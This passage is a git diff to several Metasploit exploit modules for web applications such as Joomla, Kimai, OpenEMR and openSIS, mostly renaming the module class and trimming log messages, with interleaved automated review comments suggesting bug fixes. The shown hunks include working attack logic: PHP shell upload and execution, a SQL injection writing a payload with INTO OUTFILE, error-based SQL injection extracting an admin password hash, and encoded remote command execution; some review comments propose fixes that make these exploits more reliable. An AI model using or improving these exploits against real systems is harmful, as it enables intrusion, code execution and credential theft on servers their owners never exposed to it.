required") + vprint_status("Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ - vprint_status("#{peer} - Joomla Media Manager Found and authentication isn't required") + vprint_status("Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end 
@@ -174,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote @username = datastore['USERNAME'] @password = datastore['PASSWORD'] - print_status("#{peer} - Checking Access to Media Component...") + print_status("Checking Access to Media Component...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Authentication required... Proceeding...") + print_status("Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") - print_status("#{peer} - Accessing the Login Form...") + print_status("Accessing the Login Form...") res = get_login_form if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/ fail_with(Failure::Unknown, "#{peer} - Unable to Access the Login Form") @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ - print_status("#{peer} - Authentication isn't required.... Proceeding...") + print_status("Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end - print_status("#{peer} - Accessing the Upload Form...") + print_status("Accessing the Upload Form...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action="(.*)" id="uploadForm"/ 
@@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end - print_status("#{peer} - Uploading shell...") + print_status("Uploading shell...") res = upload(upload_uri) @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end register_files_for_cleanup("#{@upload_name}.") - print_status("#{peer} - Executing shell...") + print_status("Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 5286bf927d..15e2279e94 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index b088c8e86f..3b8111d4b0 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient 
@@ -63,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if target is Kimai version 0.9.2.x # def check - vprint_status("#{peer} - Checking version...") + vprint_status("Checking version...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") }) if not res - vprint_error("#{peer} - Request timed out") + vprint_error("Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" - print_good("#{peer} - Found version: #{version}") + print_good("Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" return Exploit::CheckCode::Appears end 
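Review bot: The version gate in `check`, `version >= "0.9.2" and version <= "0.9.2.1306"`, compares strings character by character, so it does not follow release order. A constructed value such as 0.9.2.200 sorts above "0.9.2.1306" and falls outside the range even though it is numerically inside it. Comparing parsed versions, for example `Gem::Version.new(version) <= Gem::Version.new('0.9.2.1306')` together with the matching lower bound, makes the result agree with the real ordering. The same string comparison appears in the `check` methods of openemr_sqli_privesc_upload.rb (`version < "4.1.2"`) and openemr_upload_exec.rb (`version > "4.1.1"`). `check` continues past the end of this hunk.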
@@ -81,33 +81,33 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get file system path - print_status("#{peer} - Retrieving file system path...") + print_status("Retrieving file system path...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/ path = "#{$1}" - print_good("#{peer} - Found file system path: #{path}") + print_good("Found file system path: #{path}") else path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path) - print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'") + print_warning("Could not retrieve file system path. Assuming '#{path}'") end # Get MySQL table name prefix from temporary/logfile.txt - print_status("#{peer} - Retrieving MySQL table name prefix...") + print_status("Retrieving MySQL table name prefix...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/) table_prefix = "#{prefixes.flatten.last}" - print_good("#{peer} - Found table name prefix: #{table_prefix}") + print_good("Found table name prefix: #{table_prefix}") else table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path) - print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") + print_warning("Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") end # Create a backup ID - print_status("#{peer} - Creating a backup to get a valid backup ID...") + print_status("Creating a backup to get a valid backup ID...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), 
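Review bot: The `elsif prefixes = res.body.scan(...)` branch in `exploit` is taken whenever a response arrives, because `String#scan` returns an array, empty when nothing matches, and an empty array is truthy in Ruby. The `else` branch with the "Could not retrieve MySQL table name prefix" warning therefore looks unreachable, and `table_prefix` ends up as an empty string without any message. Testing the result, e.g. `prefixes = res.body.scan(...)` and then `elsif prefixes.any?`, restores the intended path. The next hunk has the same shape with `backup_ids = res.body.scan(...)`, where the `fail_with` for a missing backup ID cannot run and the method carries on with an empty `id`. `exploit` starts in this hunk and continues beyond it.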
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/) id = "#{backup_ids.flatten.last}" - print_good("#{peer} - Found backup ID: #{id}") + print_good("Found backup ID: #{id}") else fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID") end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # Write PHP payload to disk using MySQL injection 'into outfile' fname = "#{rand_text_alphanumeric(rand(10)+10)}.php" sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- " - print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") + print_status("Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(fname) else - print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}") + print_error("Sending payload failed. Received HTTP code: #{res.code}") end # Remove the backup - print_status("#{peer} - Removing the backup...") + print_status("Removing the backup...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), 
@@ -156,15 +156,15 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if not res - print_warning("#{peer} - Request timed out") + print_warning("Request timed out") elsif res.code == 302 and res.body !~ /#{id}/ - vprint_good("#{peer} - Deleted backup with ID '#{id}'") + vprint_good("Deleted backup with ID '#{id}'") else - print_warning("#{peer} - Could not remove backup with ID '#{id}'") + print_warning("Could not remove backup with ID '#{id}'") end # Execute payload - print_status("#{peer} - Retrieving file '#{fname}'...") + print_status("Retrieving file '#{fname}'...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}") }, 5) diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 8030e347cc..af5e4c5445 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -132,13 +132,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") orig_fname = upload(base) - print_status("#{peer} - Renaming #{orig_fname}...") + print_status("Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) - print_status("#{peer} - Executing #{new_fname}...") + print_status("Executing #{new_fname}...") exec(base, new_fname) end end 
diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index fc9b180f61..f12ba7d45d 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, @@ -84,13 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) - print_good("#{peer} - Response parsed successfully") + print_good("Response parsed successfully") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end 
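Review bot: In the last hunk of `exploit`, `res.body.match(/\[local_path\] => (.*\.php)/i).captures` raises NoMethodError when the body does not match, because `match` returns nil. The `fail_with(Failure::UnexpectedReply, 'Unable to parse the server response')` guard on the following line is never reached in that case. Keep the match object and test it first: `m = res.body.match(/\[local_path\] => (.*\.php)/i)`, then `fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if m.nil? || m[1].nil?`, then `payload_url = normalize_uri(target_uri.path, m[1])`. The module then stops with the intended failure reason instead of an unhandled exception.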
diff --git a/modules/exploits/unix/webapp/mambo_cache_lite.rb b/modules/exploits/unix/webapp/mambo_cache_lite.rb index ad270f3590..a3d237047f 100644 --- a/modules/exploits/unix/webapp/mambo_cache_lite.rb +++ b/modules/exploits/unix/webapp/mambo_cache_lite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/mitel_awc_exec.rb b/modules/exploits/unix/webapp/mitel_awc_exec.rb index 8179ffc36a..943f3d32ac 100644 --- a/modules/exploits/unix/webapp/mitel_awc_exec.rb +++ b/modules/exploits/unix/webapp/mitel_awc_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb index 1f0f109a81..1a558a3e0d 100644 --- a/modules/exploits/unix/webapp/moinmoin_twikidraw.rb +++ b/modules/exploits/unix/webapp/moinmoin_twikidraw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 3f92aa03d9..084d6f44b9 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index 3f0ec69676..9329442d45 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb 
+++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb index dde396f3d6..75bd25e80d 100644 --- a/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb +++ b/modules/exploits/unix/webapp/nagios3_statuswml_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 44a9e6123d..3f39baba91 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index f5fdb49389..6a18933811 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -83,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - vprint_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - vprint_status("#{peer} - Signature '#{sig}' found.") + vprint_status("Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Signature not found") + vprint_status("Signature not found") return Exploit::CheckCode::Safe end end def exploit - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") remote_exe(payload.encoded) end diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index f8b6b04ba6..2a83f31155 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient 
@@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote # Check for ofc_upload_image.php # def check - print_status("#{peer} - Sending check") + print_status("Sending check") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No ofc_upload_image.php found") + vprint_error("No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ - vprint_status("#{peer} - Found ofc_upload_image.php") + vprint_status("Found ofc_upload_image.php") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Upload @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" - print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") + print_status("Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body =~ /Saving your image to: (.+)#{@fname}/ path = $1 register_files_for_cleanup(@fname) - print_status("#{peer} - Executing '#{path}#{@fname}'") + print_status("Executing '#{path}#{@fname}'") else fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 5672d926bd..3b0a3a3eb1 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version < "4.1.2" return Exploit::CheckCode::Appears @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end def login(base, name, pass) - #print_status("#{peer} - Logging in as non-admin user [ #{datastore['USER']} ]") + #print_status("Logging in as non-admin user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}", "interface", "main", "main_screen.php"), @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM users WHERE username = 0x61646d696e LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '#{sqlq}'='#{sqlq}" post_data = "form_pubpid=#{sqli}" - print_status("#{peer} - Retrieving admin password hash through SQLi") + print_status("Retrieving admin password hash through SQLi") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin password hash is [ #{adminhash} ]") + print_status("Admin password hash is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin password failed!") end 
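Review bot: The only change in the `login` hunk edits a commented-out call, `#print_status("Logging in as non-admin user [ #{datastore['USER']} ]")`. Dead code that has to be kept in sync by hand tends to drift, so the line is better deleted. If the message is wanted, restore it as `vprint_status("Logging in as user [ #{name} ]")`, which uses the method's own `name` argument rather than a datastore key that may not be the value passed in. `login` continues outside this hunk.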
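Review bot: `print_status("Admin password hash is [ #{adminhash} ]")` writes a recovered credential hash to the console at normal verbosity, so it also lands in any spool file or saved session log of the engagement. Credential material is easier to protect when it is kept out of routine status output. Using `vprint_status("Admin password hash is [ #{adminhash} ]")` limits it to runs where verbose output was requested, and a short comment should say that the value is sensitive. The enclosing method starts and ends outside this hunk.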
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading shell [ #{payload_name} ]") + print_status("Uploading shell [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "interface", "super", "manage_site_files.php"), @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") + print_status("Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "sites", "default", "images", "#{payload_name}") @@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index 6a25429929..cd9dac9f8b 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 
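Review bot: In the openemr_upload_exec.rb `check` hunk, `peer = "#{rhost}:#{rport}"` assigns a local that shadows the `peer` helper the sibling modules in this commit call without defining it. The changed `vprint_status` line was its only use visible here. If the rest of `check` (outside this hunk) reads it only in failure messages, the assignment can be removed so the module names its target the same way as the others. If nothing else reads it, it is an unused variable.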
@@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") + print_error("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 9e01b897dc..1c7a6a73b5 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # def login(user, pass) @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php"), @@ -81,10 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if res and res.code == 200 and res.body =~ /Portal\.php/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts = { :php_function => 'system' } ) code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) junk = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable 
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote ].sample res = execute_command(payload.encoded, { :php_function => php_function }) if res and res.code == 200 and res.body =~ /hacking_log/i - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb index d271d446fa..01606273b0 100644 --- a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index d76318ede7..c6a695a8d5 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index c9afc417e0..6efb784256 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 51d6d0c8f9..b3e1bf3bbd 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb 
